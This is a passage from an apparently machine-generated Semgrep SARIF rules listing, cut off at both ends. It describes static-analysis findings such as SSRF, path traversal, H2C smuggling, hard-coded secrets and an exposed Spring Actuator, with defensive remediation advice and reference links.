'hostNetwork' key to disable this functionality."},"help":{"markdown":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod)\n - [https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces](https://kubernetes.io/docs/concepts/policy/pod-security-policy/#host-namespaces)\n","text":"Pod may use the node network namespace. This gives the pod access to the loopback device, services listening on localhost, and could be used to snoop on network activity of other pods on the same node. Remove the 'hostNetwork' key to disable this functionality."},"helpUri":"https://semgrep.dev/r/yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","id":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","name":"yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod","properties":{"precision":"very-high","tags":["CWE-406: Insufficient Control of Network Message Volume (Network Amplification)","LOW CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: yaml.kubernetes.security.hostnetwork-pod.hostnetwork-pod"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"help":{"markdown":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"If unverified user data can reach the `wkhtmltopdf` it can result in Server-Side Request Forgery vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","id":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","name":"javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","LOW CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.wkhtmltopdf.security.audit.wkhtmltopdf-injection.wkhtmltopdf-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"help":{"markdown":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling)\n - [https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c](https://labs.bishopfox.com/tech-blog/h2c-smuggling-request-smuggling-via-http/2-cleartext-h2c)\n","text":"Conditions for Nginx H2C smuggling identified. H2C smuggling allows upgrading HTTP/1.1 connections to lesser-known HTTP/2 over cleartext (h2c) connections which can allow a bypass of reverse proxy access controls, and lead to long-lived, unrestricted HTTP traffic directly to back-end servers. To mitigate: WebSocket support required: Allow only the value websocket for HTTP/1.1 upgrade headers (e.g., Upgrade: websocket). WebSocket support not required: Do not forward Upgrade headers."},"helpUri":"https://semgrep.dev/r/generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","id":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","name":"generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling","properties":{"precision":"very-high","tags":["CWE-444: Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')","MEDIUM CONFIDENCE","OWASP-A04:2021 - Insecure Design","security"]},"shortDescription":{"text":"Semgrep Finding: generic.nginx.security.possible-h2c-smuggling.possible-nginx-h2c-smuggling"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","id":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","name":"python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.net.tainted-django-http-request-paramiko.tainted-django-http-request-paramiko"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"help":{"markdown":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n","text":"This hashing algorithm is insecure. If this hash is used in a security context, such as password hashing, it should be converted to a stronger hashing algorithm."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.insecure-hash.insecure-hash","id":"cpp.lang.security.crypto.insecure-hash.insecure-hash","name":"cpp.lang.security.crypto.insecure-hash.insecure-hash","properties":{"precision":"very-high","tags":["CWE-328: Use of Weak Hash","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.insecure-hash.insecure-hash"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"help":{"markdown":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none)\n - [https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware](https://learn.microsoft.com/en-us/aspnet/core/security/authentication/cookie?view=aspnetcore-8.0#cookie-policy-middleware)\n - [https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions](https://learn.microsoft.com/en-us/dotnet/api/microsoft.aspnetcore.http.cookieoptions)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://web.dev/articles/samesite-cookies-explained](https://web.dev/articles/samesite-cookies-explained)\n","text":"Detected a cookie options with the `SameSite` flag set to \"None\". This is a potential security risk that arises from the way web browsers manage cookies. In a typical web application, cookies are used to store and transmit session-related data between a client and a server. To enhance security, cookies can be marked with the \"SameSite\" attribute, which restricts their usage based on the origin of the page that set them. This attribute can have three values: \"Strict,\" \"Lax,\" or \"None\". If this wasn't intentional, it's recommended to set the the `SameSite` attribute of the important cookies (e.g., session cookie) to either `Strict` or `Lax`. When `SameSite` is set to \"Strict\", no 3rd party cookie will be sent with outgoing requests, this is the most secure and private setting but harder to deploy with good usability. Setting it to \"Lax\" is the minimum requirement. You can use the Cookie Policy Middleware to globally set the `SameSite` attribute. You can then use the CookieOptions class when instantiating the cookie, which inherits these settings and will require future developers to have to explicitly override them on a case-by-case basis if needed. This approach ensures cookies are secure by default."},"helpUri":"https://semgrep.dev/r/csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","id":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","name":"csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none","properties":{"precision":"very-high","tags":["CWE-1275: Sensitive Cookie with Improper SameSite Attribute","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet-core.cookies.cookie-samesite-none.cookie-samesite-none"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"help":{"markdown":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine)\n - [https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/](https://www.praetorian.com/blog/pathcombine-security-issues-in-aspnet-applications/)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks](https://docs.microsoft.com/en-us/dotnet/api/system.io.path.combine?view=net-6.0#remarks)\n","text":"String argument $A is used to read or write data from a file via Path.Combine without direct sanitization via Path.GetFileName. If the path is user-supplied data this can lead to path traversal."},"helpUri":"https://semgrep.dev/r/csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","id":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","name":"csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.filesystem.unsafe-path-combine.unsafe-path-combine"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A hard-coded credential was detected. It is not recommended to store credentials in source-code, as this risks secrets being leaked and used by either an internal or external malicious adversary. It is recommended to use environment variables to securely provide credentials or retrieve credentials from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","id":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","name":"javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-jwt-hardcoded-secret.express-jwt-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","id":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","name":"ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.pg.ruby-pg-hardcoded-secret.ruby-pg-hardcoded-secret"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi)\n - [https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/](https://fastapi.palletsprojects.com/en/2.3.x/patterns/fileuploads/)\n - [https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths](https://fastapi.tiangolo.com/tutorial/path-params/#path-parameters-containing-paths)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename](https://werkzeug.palletsprojects.com/en/3.0.x/utils/#werkzeug.utils.secure_filename)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. In FastAPI apps, consider using the Starlette `:path` annotation in the route declaration to automatically sanitize paths and filenames."},"helpUri":"https://semgrep.dev/r/python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","id":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","name":"python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.file.tainted-path-traversal-toml-fastapi.tainted-path-traversal-toml-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"help":{"markdown":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp)\n - [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)\n","text":"RegExp() called with a `$ARG` function argument, this might allow an attacker to cause a Regular Expression Denial-of-Service (ReDoS) within your application as RegExP blocks the main thread. For this reason, it is recommended to use hardcoded regexes instead. If your regex is run on user-controlled input, consider performing input validation or use a regex checking/sanitization library such as https://www.npmjs.com/package/recheck to verify that the regex does not appear vulnerable to ReDoS."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","id":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","name":"javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp","properties":{"precision":"very-high","tags":["CWE-1333: Inefficient Regular Expression Complexity","LOW CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","OWASP-A06:2017 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.detect-non-literal-regexp.detect-non-literal-regexp"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"help":{"markdown":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace)\n - [https://github.com/returntocorp/semgrep-rules/issues/518](https://github.com/returntocorp/semgrep-rules/issues/518)\n","text":"Detected a potentially dynamic ClientTrace. This occurred because semgrep could not find a static definition for '$TRACE'. Dynamic ClientTraces are dangerous because they deserialize function code to run when certain Request events occur, which could lead to code being run without your knowledge. Ensure that your ClientTrace is statically defined."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","id":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","name":"go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace","properties":{"precision":"very-high","tags":["CWE-913: Improper Control of Dynamically-Managed Code Resources","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.dynamic-httptrace-clienttrace.dynamic-httptrace-clienttrace"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"help":{"markdown":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage)\n - [https://www.npmjs.com/package/csurf](https://www.npmjs.com/package/csurf)\n - [https://www.npmjs.com/package/csrf](https://www.npmjs.com/package/csrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"A CSRF middleware was not detected in your express application. Ensure you are either using one such as `csurf` or `csrf` (see rule references) and/or you are properly doing CSRF validation in your routes with a token or cookies."},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","id":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","name":"javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","LOW CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-check-csurf-middleware-usage.express-check-csurf-middleware-usage"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"help":{"markdown":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid)\n - [https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data](https://docs.djangoproject.com/en/4.2/ref/forms/api/#accessing-clean-data)\n","text":"Use $FORM.cleaned_data[] instead of request.POST[] after form.is_valid() has been executed to only access sanitized data"},"helpUri":"https://semgrep.dev/r/python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","id":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","name":"python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid","properties":{"precision":"very-high","tags":["CWE-20: Improper Input Validation","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.django-using-request-post-after-is-valid.django-using-request-post-after-is-valid"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"help":{"markdown":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln)\n - [https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb](https://github.com/presidentbeef/brakeman/blob/main/lib/brakeman/checks/check_without_protection.rb)\n - [https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/](https://www.acunetix.com/vulnerabilities/web/rails-mass-assignment/)\n","text":"Checks for calls to without_protection during mass assignment (which allows record creation from hash values). This can lead to users bypassing permissions protections. For Rails 4 and higher, mass protection is on by default. Fix: Don't use :without_protection => true. Instead, configure attr_accessible to control attribute access."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","id":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","name":"ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln","properties":{"precision":"very-high","tags":["CWE-915: Improperly Controlled Modification of Dynamically-Determined Object Attributes","LOW CONFIDENCE","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.unprotected-mass-assign.mass-assignment-vuln"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"help":{"markdown":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled)\n - [https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints](https://docs.spring.io/spring-boot/docs/current/reference/html/production-ready-features.html#production-ready-endpoints-exposing-endpoints)\n - [https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785](https://medium.com/walmartglobaltech/perils-of-spring-boot-actuators-misconfiguration-185c43a0f785)\n - [https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators](https://blog.maass.xyz/spring-actuator-security-part-1-stealing-secrets-using-spring-actuators)\n","text":"Spring Boot Actuator is fully enabled. This exposes sensitive endpoints such as /actuator/env, /actuator/logfile, /actuator/heapdump and others. Unless you have Spring Security enabled or another means to protect these endpoints, this functionality is available without authentication, causing a significant security risk."},"helpUri":"https://semgrep.dev/r/java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","id":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","name":"java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled","properties":{"precision":"very-high","tags":["CWE-200: Exposure of Sensitive Information to an Unauthorized Actor","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.audit.spring-actuator-fully-enabled.spring-actuator-fully-enabled"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information."},"help":{"markdown":"The AWS CloudWatch Log Group has no retention. Missing retention in log groups can cause losing important event information.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-cloudwatch-log-group-no-retention.aws-cloudwatch-log-group-no-retention)\n - 